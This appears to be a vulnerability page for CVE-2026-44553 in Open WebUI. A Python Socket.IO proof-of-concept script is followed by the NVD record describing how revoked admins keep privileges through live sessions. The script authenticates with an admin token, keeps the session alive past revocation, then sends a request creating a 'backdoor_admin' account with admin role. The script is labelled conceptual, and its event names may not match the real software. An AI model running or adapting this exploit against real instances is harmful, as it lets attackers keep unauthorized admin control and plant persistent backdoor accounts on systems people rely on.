CVE-2026-44553

import socketio import time # Conceptual Proof of Concept for CVE-2026-44553 # This script demonstrates maintaining admin privileges via a persistent Socket.IO session class ExploitClient: def __init__(self, target_url): self.sio = socketio.Client() self.target_url = target_url self.setup_handlers() def setup_handlers(self): @self.sio.event def connect(): print("[+] Connected to Open WebUI Socket.IO server") @self.sio.event def disconnect(): print("[-] Disconnected from server") def login(self, token): """Authenticate with a valid admin token""" print(f"[*] Attempting authentication with token: {token}") # Emit authentication event self.sio.emit('auth', {'token': token}) def maintain_session_and_exploit(self): """Simulate keeping the connection alive and exploiting after revocation""" try: self.sio.connect(self.target_url) # 1. Authenticate as Admin self.login('VALID_ADMIN_TOKEN_HERE') print("[*] Session established. Waiting for admin to revoke role in UI...") print("[*] Keeping connection alive via heartbeats...") # Simulate waiting time while admin revokes access in the web interface # The vulnerability is that the socket connection remains valid time.sleep(60) # 2. Attempt privileged action despite revocation print("[*] Attempting to create a new user (Admin action)...") # This payload would succeed because SESSION_POOL was not cleared malicious_payload = { 'username': 'backdoor_admin', 'password': 'password123', 'role': 'admin' } self.sio.emit('create_user', malicious_payload) print("[+] Privileged action sent via revoked session.") except Exception as e: print(f"[!] Error: {e}") finally: self.sio.disconnect() if __name__ == "__main__": target = "http://target-open-webui-instance:3000" exploit = ExploitClient(target) exploit.maintain_session_and_exploit()

{"cve": {"id": "CVE-2026-44553", "sourceIdentifier": "[email protected]", "published": "2026-05-15T20:16:46.707", "lastModified": "2026-05-15T21:16:35.810", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, administrative role changes and user deletions do not iterate SESSION_POOL to disconnect affected sessions. As a result, a user whose admin role has been revoked retains admin privileges within their existing Socket.IO session for as long as they keep the connection alive (via automatic heartbeats). The gap is exclusive to the Socket.IO session cache. This vulnerability is fixed in 0.9.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-613"}]}], "references": [{"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-45m8-cpm2-3v65", "source": "[email protected]"}, {"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-45m8-cpm2-3v65", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}